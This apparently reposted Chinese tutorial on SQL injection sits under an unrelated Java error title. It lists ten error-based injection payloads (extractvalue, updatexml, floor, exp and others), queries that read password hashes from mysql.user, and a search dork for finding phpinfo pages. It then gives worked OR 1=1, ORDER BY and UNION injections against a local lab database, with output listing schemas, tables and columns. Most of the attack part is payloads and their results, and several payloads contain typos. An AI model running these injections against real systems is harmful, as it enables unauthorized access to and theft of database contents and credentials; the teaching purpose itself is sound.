java.lang.ClassNotFoundException: org.springframework.web.context.ContextLoaderListener
阿新 • • 發佈:2020-12-05
SQL注入
SQL常用函式
- SQL常用函式
MID(要擷取的字串,起始位置,結束位置)擷取字串CHAR(ASCII)返回ASCII碼對應的字元ASCII(字元)返回字元對應的ASCII碼IF(邏輯表示式,返回值1,返回值2)用於判斷SUBSTR(要擷取的字串,起始位置,結束位置)擷取字串LENGTH(字串)返回字串長度COUT(列名)返回當前列名下有效記錄數SLEEP(s)靜止s秒,數字型別,可自定義# /**/ --註釋符CONCAT(字串1,字串2...)拼接字串LOAD_FILE(檔名稱)載入檔案INTO OUTFILE '檔名稱'輸出
常用十大報錯函式
-
floor()select * from test where id=1 and (select 1 from (select count(*), concat(user(), floor(rand(0)*2)) x from information_schema.tables group by x) a);
-
extractvalue()select * from test where id=1 and (extractvalue(1, conact(0x7e, (select user()),0x7e)));
-
updatexml()select * from test where id=1 and (updatexml(1, conact(0x7e, (select user()), 0x7e), 1));
-
geometrycollection()select * from test where id=1 and geometrycollection((select * from (select * from (select user()) a) b));
-
multipoint()select * from test where id=1 and multipoint((select * from (select * from (select user()) a) b));
-
polygon()select * from test where id=1 and polyon((select * from (select * from (select user()) a) b));
-
multipolygon()select * from test where id=1 and multipolygon((select * from (select * from (select user()) a) b));
-
linestring()select * from test where id=1 and linestring((select * from (select * from (select user()) a) b));
-
multilinestring()select * from test where id=1 and multilinestring((select * from (select * from (select user()) a) b));
-
exp()select * from test where id=1 and exp(~(select * from (select user()) a));
MySQL常用函式
-
查詢版本
select version();
-
查詢密碼
select password from mysql.user;
-
查詢所有資料
select * from mysql.user;
MySQL資料庫配置檔案
-
MySQL使用者許可權
information_schema.USER_PRIVILEGESselect * from information_schema.USER_PRIVILEGES;
-
MySQL資料庫及表的情況
information_schema.TABLESselect * from information_schema.TABLES;
-
MySQL資料庫及表的情況(包含欄位)
information_schema.COLUMNSselect * from information_schema.COLUMNS
SQL注入測試
-
瀏覽器中輸入
inurl:/phpinfo.php
-
SQL注入是如何產生的
- 這些攻擊發生在當不可信的資料作為命令或者查詢語句的一部分,被髮送給直譯器的時候
- 攻擊者傳送的惡意資料可以欺騙直譯器
- 以執行計劃外的命令或者在未被恰當授權時訪問資料
or語句 SQL注入
- 功能
- 獲取整張表額資料
# 正常查詢操作
MariaDB [sel]> select * from grades where name='Sunny';
+-------+------+---------+------+
| name | sex | chinese | math |
+-------+------+---------+------+
| Sunny | boy | 93 | 96 |
+-------+------+---------+------+
# `1 row in set (0.000 sec)`
# SQL注入操作
MariaDB [sel]> select * from grades where name='Sunny' or 1=1;
+-------+------+---------+------+
| name | sex | chinese | math |
+-------+------+---------+------+
| Sunny | boy | 93 | 96 |
| Jerry | boy | 97 | 91 |
| Marry | girl | 95 | 94 |
| Tommy | boy | 98 | 94 |
+-------+------+---------+------+
# `4 rows in set (0.001 sec)`
MariaDB [sel]> select * from news where id=0 or 1=1;
+----+----------+--------------------------+------------+
| id | title | content | createtime |
+----+----------+--------------------------+------------+
| 1 | 基本知識 | 第1章 什麼是Javascript | 1607050534 |
| 2 | 基本知識 | 第2章 HTML中的Javascript | 1607050590 |
| 3 | 基本知識 | 第3章 語言基礎 | 1607052573 |
| 4 | 基本知識 | 第4章 變數、作用域和記憶體 | 1607070553 |
+----+----------+--------------------------+------------+
# `4 rows in set (0.001 sec)`
order by語句 SQL注入
- 功能
- 推斷表的記錄的總量
MariaDB [sel]> select * from news where id=2 order by 5;
# `ERROR 1054 (42S22): Unknown column '5' in 'order clause'`
MariaDB [sel]> select * from news where id=2 order by 4;
+----+----------+--------------------------+------------+
| id | title | content | createtime |
+----+----------+--------------------------+------------+
| 2 | 基本知識 | 第2章 HTML中的Javascript | 1607050590 |
+----+----------+--------------------------+------------+
# `1 row in set (0.000 sec)`
union語句 SQL注入
- 功能
- 推斷表的欄位的總量
# 正常情況
MariaDB [sel]> select * from news where id=1;
+----+----------+------------------------+------------+
| id | title | content | createtime |
+----+----------+------------------------+------------+
| 1 | 基本知識 | 第1章 什麼是Javascript | 1607050534 |
+----+----------+------------------------+------------+
# `1 row in set (0.000 sec)`
MariaDB [sel]> select * from news where id=1 union select 0,0,0;
# `ERROR 1222 (21000): The used SELECT statements have a different number of columns`
MariaDB [sel]> select * from news where id=1 union select 0,0,0,0;
+----+----------+------------------------+------------+
| id | title | content | createtime |
+----+----------+------------------------+------------+
| 1 | 基本知識 | 第1章 什麼是Javascript | 1607050534 |
| 0 | 0 | 0 | 0 |
+----+----------+------------------------+------------+
# `2 rows in set (0.006 sec)`
MariaDB [sel]> select * from news where id=1 union select 0,0,0,0,0;
# `ERROR 1222 (21000): The used SELECT statements have a different number of columns`
- 功能
- 獲取mysql資料
MariaDB [sel]> select * from news where id=1 union select 1,2,host,4 from mysql.user;
+----+----------+------------------------+------------+
| id | title | content | createtime |
+----+----------+------------------------+------------+
| 1 | 基本知識 | 第1章 什麼是Javascript | 1607050534 |
| 1 | 2 | 127.0.0.1 | 4 |
| 1 | 2 | ::1 | 4 |
| 1 | 2 | localhost | 4 |
+----+----------+------------------------+------------+
# `4 rows in set (0.011 sec)`
- 功能
- 獲取資料庫中的所有的資料庫名
MariaDB [sel]> select * from news where id=0 union select 1,2,3,table_schema from information_schema.TABLES;
+----+-------+---------+--------------------+
| id | title | content | createtime |
+----+-------+---------+--------------------+
| 1 | 2 | 3 | information_schema |
| 1 | 2 | 3 | mysql |
| 1 | 2 | 3 | performance_schema |
| 1 | 2 | 3 | phpmyadmin |
| 1 | 2 | 3 | sel |
| 1 | 2 | 3 | stu |
+----+-------+---------+--------------------+
# `6 rows in set (0.018 sec)`
- 功能
- 獲取資料庫中的所有的表名
MariaDB [sel]> select * from news where id=0 union select 1,2,3,table_name from information_schema.TABLES;
- 功能
- 獲取某個資料庫中的所有的表名
MariaDB [sel]> select * from news where id=0 union select 1,2,3,table_name from information_schema.TABLES where table_schema='sel';
+----+-------+---------+------------+
| id | title | content | createtime |
+----+-------+---------+------------+
| 1 | 2 | 3 | bank |
| 1 | 2 | 3 | best |
| 1 | 2 | 3 | bestmath |
| 1 | 2 | 3 | grades |
| 1 | 2 | 3 | news |
| 1 | 2 | 3 | resume |
| 1 | 2 | 3 | stu1 |
| 1 | 2 | 3 | stu2 |
+----+-------+---------+------------+
# `8 rows in set (0.012 sec)`
- 功能
- 獲取某張表中的所有的欄位名
MariaDB [sel]> select * from news where id=0 union select 1,2,3,column_name from information_schema.COLUMNS where table_name='news';
+----+-------+---------+------------+
| id | title | content | createtime |
+----+-------+---------+------------+
| 1 | 2 | 3 | id |
| 1 | 2 | 3 | title |
| 1 | 2 | 3 | content |
| 1 | 2 | 3 | createtime |
+----+-------+---------+------------+
# `4 rows in set (0.016 sec)`
- 功能
- 獲取欄位內容
MariaDB [sel]> select * from news where id=1 union select 1,2,3,title from sel.news;
+----+----------+------------------------+------------+
| id | title | content | createtime |
+----+----------+------------------------+------------+
| 1 | 基本知識 | 第1章 什麼是Javascript | 1607050534 |
| 1 | 2 | 3 | 基本知識 |
+----+----------+------------------------+------------+
# `2 rows in set (0.011 sec)`